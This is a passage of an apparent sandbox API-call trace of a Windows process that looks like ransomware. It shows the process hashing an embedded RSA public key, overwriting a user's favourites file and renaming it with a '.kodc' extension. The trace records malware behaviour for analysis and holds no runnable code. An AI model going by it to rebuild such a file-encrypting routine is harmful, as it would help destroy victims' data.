Size=0x64) returned 0x706018 [0101.665] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x706018 | out: hHeap=0x630000) returned 1 [0101.665] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xeb) returned 0x32b14c8 [0101.665] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x706018 [0101.665] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x706018 | out: hHeap=0x630000) returned 1 [0101.665] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x706018 [0101.665] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x706018 | out: hHeap=0x630000) returned 1 [0101.665] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32b14c8 | out: hHeap=0x630000) returned 1 [0101.665] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x69be70 [0101.665] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32ceca0 | out: hHeap=0x630000) returned 1 [0101.665] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4c) returned 0x3318138 [0101.665] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32ceca0 [0101.665] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x69ba50 [0101.665] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec40 [0101.665] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x9bb7a40 [0101.665] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec40 | out: hHeap=0x630000) returned 1 [0101.665] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec40 [0101.665] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec80 [0101.665] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec50 [0101.665] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cecb0 [0101.665] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec90 [0101.666] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec60 [0101.666] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec10 [0101.666] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x9bb80b8 [0101.666] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec80 | out: hHeap=0x630000) returned 1 [0101.666] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8) returned 0x32cec80 [0101.666] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec40 | out: hHeap=0x630000) returned 1 [0101.666] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec40 [0101.666] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec70 [0101.666] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32ced00 [0101.666] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cece0 [0101.666] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x9bb80d0 [0101.666] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32ced00 | out: hHeap=0x630000) returned 1 [0101.666] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x14) returned 0x32aed00 [0101.666] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec70 | out: hHeap=0x630000) returned 1 [0101.666] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x9bb80a0 [0101.666] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cece0 | out: hHeap=0x630000) returned 1 [0101.666] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x9bb7a28 [0101.666] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec40 | out: hHeap=0x630000) returned 1 [0101.666] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x9bb7a10 [0101.666] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec50 | out: hHeap=0x630000) returned 1 [0101.666] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x9bb79c8 [0101.666] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec60 | out: hHeap=0x630000) returned 1 [0101.666] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10) returned 0x9bb80e8 [0101.667] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9bb79c8 | out: hHeap=0x630000) returned 1 [0101.667] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10) returned 0x9bb79c8 [0101.667] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9bb7a10 | out: hHeap=0x630000) returned 1 [0101.667] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8) returned 0x32cec60 [0101.667] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32ceca0 | out: hHeap=0x630000) returned 1 [0101.667] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x14) returned 0x32ad2c0 [0101.667] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec60 | out: hHeap=0x630000) returned 1 [0101.667] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x18) returned 0x32ad520 [0101.667] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9bb80b8 | out: hHeap=0x630000) returned 1 [0101.667] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x9bb80b8 [0101.667] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec80 | out: hHeap=0x630000) returned 1 [0101.667] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x204) returned 0x9b96968 [0101.667] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9bb7a40 | out: hHeap=0x630000) returned 1 [0101.667] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x108) returned 0x9b8c658 [0101.667] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9bb79c8 | out: hHeap=0x630000) returned 1 [0101.667] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x210) returned 0x32cef08 [0101.667] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32ad520 | out: hHeap=0x630000) returned 1 [0101.667] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10c) returned 0x9b8c428 [0101.667] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cecb0 | out: hHeap=0x630000) returned 1 [0101.667] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x108) returned 0x9b8c540 [0101.667] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9bb80b8 | out: hHeap=0x630000) returned 1 [0101.667] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x200) returned 0x9b9c950 [0101.667] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b8c658 | out: hHeap=0x630000) returned 1 [0101.668] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x69bd68 [0101.668] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cecc0 | out: hHeap=0x630000) returned 1 [0101.668] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x693158 | out: hHeap=0x630000) returned 1 [0101.668] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x69be70 | out: hHeap=0x630000) returned 1 [0101.668] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x69bd68 | out: hHeap=0x630000) returned 1 [0101.668] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32ad2c0 | out: hHeap=0x630000) returned 1 [0101.668] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b8c540 | out: hHeap=0x630000) returned 1 [0101.668] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cef08 | out: hHeap=0x630000) returned 1 [0101.668] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b9c950 | out: hHeap=0x630000) returned 1 [0101.668] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b8c428 | out: hHeap=0x630000) returned 1 [0101.668] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec90 | out: hHeap=0x630000) returned 1 [0101.668] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9bb80e8 | out: hHeap=0x630000) returned 1 [0101.668] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec10 | out: hHeap=0x630000) returned 1 [0101.668] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9bb7a28 | out: hHeap=0x630000) returned 1 [0101.668] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32aed00 | out: hHeap=0x630000) returned 1 [0101.668] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9bb80d0 | out: hHeap=0x630000) returned 1 [0101.668] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9bb80a0 | out: hHeap=0x630000) returned 1 [0101.668] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3298d18 | out: hHeap=0x630000) returned 1 [0101.668] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3316db8 | out: hHeap=0x630000) returned 1 [0101.668] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x69bc60 | out: hHeap=0x630000) returned 1 [0101.668] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9bb8088 | out: hHeap=0x630000) returned 1 [0101.668] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9bb61a8 | out: hHeap=0x630000) returned 1 [0101.668] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b96968 | out: hHeap=0x630000) returned 1 [0101.668] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x69ba50 | out: hHeap=0x630000) returned 1 [0101.669] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3318138 | out: hHeap=0x630000) returned 1 [0101.669] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b8c770 | out: hHeap=0x630000) returned 1 [0101.669] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32adf00 | out: hHeap=0x630000) returned 1 [0101.669] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec00 | out: hHeap=0x630000) returned 1 [0101.669] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32adee0 | out: hHeap=0x630000) returned 1 [0101.669] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3338dc8 | out: hHeap=0x630000) returned 1 [0101.669] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32d2a78 | out: hHeap=0x630000) returned 1 [0101.669] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3317170 | out: hHeap=0x630000) returned 1 [0101.669] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cc1c0 | out: hHeap=0x630000) returned 1 [0101.669] WriteFile (in: hFile=0x5cc, lpBuffer=0x65e7c0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x9e2fb14, lpOverlapped=0x0 | out: lpBuffer=0x65e7c0*, lpNumberOfBytesWritten=0x9e2fb14*=0x80, lpOverlapped=0x0) returned 1 [0101.669] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x65e7c0 | out: hHeap=0x630000) returned 1 [0101.669] SetFilePointerEx (in: hFile=0x5cc, liDistanceToMove=0x85, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0101.669] WriteFile (in: hFile=0x5cc, lpBuffer=0x69b948*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x9e2fb50, lpOverlapped=0x0 | out: lpBuffer=0x69b948*, lpNumberOfBytesWritten=0x9e2fb50*=0x100, lpOverlapped=0x0) returned 1 [0101.669] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x69b948 | out: hHeap=0x630000) returned 1 [0101.669] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x32ce5b0 [0101.670] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x428) returned 0x9b9c950 [0101.670] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ywA3qgOrH00u8DIzdAJmeI3ndBL6uaF5KTvM8FRT", cchWideChar=-1, lpMultiByteStr=0x9b9c950, cbMultiByte=1064, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ywA3qgOrH00u8DIzdAJmeI3ndBL6uaF5KTvM8FRT", lpUsedDefaultChar=0x0) returned 41 [0101.670] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x430) returned 0x694598 [0101.670] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b9c950 | out: hHeap=0x630000) returned 1 [0101.670] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32ce5b0 | out: hHeap=0x630000) returned 1 [0101.670] WriteFile (in: hFile=0x5cc, lpBuffer=0x694598*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x9e2fb50, lpOverlapped=0x0 | out: lpBuffer=0x694598*, lpNumberOfBytesWritten=0x9e2fb50*=0x28, lpOverlapped=0x0) returned 1 [0101.670] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x694598 | out: hHeap=0x630000) returned 1 [0101.670] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0101.670] WriteFile (in: hFile=0x5cc, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x9e2fb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x9e2fb50*=0x26, lpOverlapped=0x0) returned 1 [0101.670] CloseHandle (hObject=0x5cc) returned 1 [0101.674] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xa0) returned 0x32c9230 [0101.674] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8a0) returned 0x32d0db8 [0101.674] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32c9230 | out: hHeap=0x630000) returned 1 [0101.674] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Windows Live\\Get Windows Live.url" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\windows live\\get windows live.url"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Windows Live\\Get Windows Live.url.kodc" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\windows live\\get windows live.url.kodc")) returned 1 [0101.675] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32d0db8 | out: hHeap=0x630000) returned 1 [0101.675] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33171a8 | out: hHeap=0x630000) returned 1 [0101.675] VirtualFree (lpAddress=0x21b0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0101.676] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32b2de0 | out: hHeap=0x630000) returned 1 [0101.676] FindNextFileW (in: hFindFile=0x670618, lpFindFileData=0x9e2fba4 | out: lpFindFileData=0x9e2fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x28d4b900, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d8930c0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x85, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Windows Live Gallery.url", cAlternateFileName="WINDOW~2.URL")) returned 1 [0101.676] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x70) returned 0x332da38 [0101.676] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xa6) returned 0x32b2de0 [0101.676] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332da38 | out: hHeap=0x630000) returned 1 [0101.676] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Windows Live\\Windows Live Gallery.url") returned=".url" [0101.676] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Windows Live\\Windows Live Gallery.url" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\windows live\\windows live gallery.url"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5cc [0101.678] GetFileSizeEx (in: hFile=0x5cc, lpFileSize=0x9e2fb40 | out: lpFileSize=0x9e2fb40*=133) returned 1 [0101.678] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x21b0000 [0101.681] SetFilePointerEx (in: hFile=0x5cc, liDistanceToMove=0x5f, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0101.681] ReadFile (in: hFile=0x5cc, lpBuffer=0x21b0000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x9e2fb78, lpOverlapped=0x0 | out: lpBuffer=0x21b0000*, lpNumberOfBytesRead=0x9e2fb78*=0x26, lpOverlapped=0x0) returned 1 [0101.682] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x33171a8 [0101.682] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33171a8 | out: hHeap=0x630000) returned 1 [0101.682] SetFilePointer (in: hFile=0x5cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0101.682] ReadFile (in: hFile=0x5cc, lpBuffer=0x21b0000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x9e2fb70, lpOverlapped=0x0 | out: lpBuffer=0x21b0000*, lpNumberOfBytesRead=0x9e2fb70*=0x85, lpOverlapped=0x0) returned 1 [0101.682] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAxnvHZzybKGUxH+Cc7ttW\\\\nHyoUm91TmryPiZ9LNnaMWhnZS7t38EODQuii2GcK55Ao4ABm2yEHPJ14ahmXpL+n\\\\n\\/k8p8BIMBjXGBDQcLASJ22fAabOruiNa83d0jz71y4\\/zLglfnHHFdyjFfNDlFvgG\\\\nipjfuYMJ2awwHYNxu0eGTRwFoeFN0gYV8wJauSL2tH\\/CRGeRp0GzRCXBasIKVhIe\\\\n6PmZEE3u03hDY6XBRU8yz4AFxBhgSJDJrrSoUyYfhrrxBXfeEicdl5iq8yJIRGs+\\\\nZiX0IBUK3KZQidFLch4zt8Xm8hGfH5Rks+xUVIAQP7+M3VHWYK9GmZZ5tjyWxwoO\\\\nIQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0101.682] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x1f1) returned 0x32d2a78 [0101.682] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAxnvHZzybKGUxH+Cc7ttW\\\\nHyoUm91TmryPiZ9LNnaMWhnZS7t38EODQuii2GcK55Ao4ABm2yEHPJ14ahmXpL+n\\\\n\\/k8p8BIMBjXGBDQcLASJ22fAabOruiNa83d0jz71y4\\/zLglfnHHFdyjFfNDlFvgG\\\\nipjfuYMJ2awwHYNxu0eGTRwFoeFN0gYV8wJauSL2tH\\/CRGeRp0GzRCXBasIKVhIe\\\\n6PmZEE3u03hDY6XBRU8yz4AFxBhgSJDJrrSoUyYfhrrxBXfeEicdl5iq8yJIRGs+\\\\nZiX0IBUK3KZQidFLch4zt8Xm8hGfH5Rks+xUVIAQP7+M3VHWYK9GmZZ5tjyWxwoO\\\\nIQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0101.682] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAxnvHZzybKGUxH+Cc7ttW\\\\nHyoUm91TmryPiZ9LNnaMWhnZS7t38EODQuii2GcK55Ao4ABm2yEHPJ14ahmXpL+n\\\\n\\/k8p8BIMBjXGBDQcLASJ22fAabOruiNa83d0jz71y4\\/zLglfnHHFdyjFfNDlFvgG\\\\nipjfuYMJ2awwHYNxu0eGTRwFoeFN0gYV8wJauSL2tH\\/CRGeRp0GzRCXBasIKVhIe\\\\n6PmZEE3u03hDY6XBRU8yz4AFxBhgSJDJrrSoUyYfhrrxBXfeEicdl5iq8yJIRGs+\\\\nZiX0IBUK3KZQidFLch4zt8Xm8hGfH5Rks+xUVIAQP7+M3VHWYK9GmZZ5tjyWxwoO\\\\nIQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0101.682] CryptAcquireContextW (in: phProv=0x9e2fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x9e2fa50*=0x693158) returned 1 [0101.683] CryptCreateHash (in: hProv=0x693158, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x9e2fa58 | out: phHash=0x9e2fa58) returned 1 [0101.683] CryptHashData (hHash=0x3331bc8, pbData=0x32d2a78, dwDataLen=0x1f1, dwFlags=0x0) returned 1 [0101.683] CryptGetHashParam (in: hHash=0x3331bc8, dwParam=0x2, pbData=0x0, pdwDataLen=0x9e2fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x9e2fa54) returned 1 [0101.683] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x11) returned 0x32adf00 [0101.683] CryptGetHashParam (in: hHash=0x3331bc8, dwParam=0x2, pbData=0x32adf00, pdwDataLen=0x9e2fa54, dwFlags=0x0 | out: pbData=0x32adf00, pdwDataLen=0x9e2fa54) returned 1 [0101.683] GetLastError () returned 0x0 [0101.683] CryptDestroyHash (hHash=0x3331bc8) returned 1 [0101.683] CryptReleaseContext (hProv=0x693158, dwFlags=0x0) returned 1 [0101.683] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32d2a78 | out: hHeap=0x630000) returned 1 [0101.683] UuidCreate (in: Uuid=0x9e2fa48 | out: Uuid=0x9e2fa48) returned 0x0 [0101.684] UuidToStringA (in: Uuid=0x9e2fa48, StringUuid=0x9e2fa40 | out: StringUuid=0x9e2fa40) returned 0x0 [0101.684] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x3317170 [0101.684] RpcStringFreeA (in: String=0x9e2fa40 | out: String=0x9e2fa40) returned 0x0 [0101.684] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33171a8 | out: hHeap=0x630000) returned 1 [0101.684] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x33171a8 [0101.684] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x90) returned 0x65e7c0 [0101.684] SetFilePointer (in: hFile=0x5cc, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0101.684] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3317170 | out: hHeap=0x630000) returned 1 [0101.684] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x1f0) returned 0x32cc1c0 [0101.684] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x3317170 [0101.684] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x1f0) returned 0x32d2a78 [0101.684] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x58) returned 0x3338dc8 [0101.684] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x40) returned 0x9bb61a8 [0101.684] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x9bb8088 [0101.684] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x40) returned 0x9bb61f0 [0101.684] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x9bb80a0 [0101.684] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x9bb80d0 [0101.684] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x9bb7a28 [0101.684] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x9bb80e8 [0101.684] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x24) returned 0x334ce70 [0101.684] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x158) returned 0x9b9f078 [0101.684] RtlReAllocateHeap (Heap=0x630000, Flags=0x0, Ptr=0x9b9f078, Size=0x218) returned 0x32cef08 [0101.684] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x558) returned 0x694598 [0101.684] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9bb80d0 | out: hHeap=0x630000) returned 1 [0101.684] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9bb80e8 | out: hHeap=0x630000) returned 1 [0101.684] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9bb7a28 | out: hHeap=0x630000) returned 1 [0101.684] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x334ce70 | out: hHeap=0x630000) returned 1 [0101.684] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x694598 | out: hHeap=0x630000) returned 1 [0101.684] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x9bb7a28 [0101.684] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8) returned 0x32cec00 [0101.684] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10) returned 0x9bb80e8 [0101.684] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x18) returned 0x32adee0 [0101.684] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x9) returned 0x9bb80d0 [0101.684] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8) returned 0x32cec10 [0101.685] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10e) returned 0x9b8c770 [0101.685] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332fc30 [0101.685] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x58) returned 0x3338fa8 [0101.685] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x14) returned 0x32adf00 [0101.685] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x104) returned 0x9b8c428 [0101.685] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x14) returned 0x32aed00 [0101.685] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec90 [0101.685] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b8c770 | out: hHeap=0x630000) returned 1 [0101.685] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9bb80e8 | out: hHeap=0x630000) returned 1 [0101.685] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec10 | out: hHeap=0x630000) returned 1 [0101.685] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9bb80d0 | out: hHeap=0x630000) returned 1 [0101.685] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32adee0 | out: hHeap=0x630000) returned 1 [0101.685] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec00 | out: hHeap=0x630000) returned 1 [0101.685] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9bb7a28 | out: hHeap=0x630000) returned 1 [0101.685] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332fc30 | out: hHeap=0x630000) returned 1 [0101.685] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3338dc8 | out: hHeap=0x630000) returned 1 [0101.685] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cef08 | out: hHeap=0x630000) returned 1 [0101.685] GetCurrentThreadId () returned 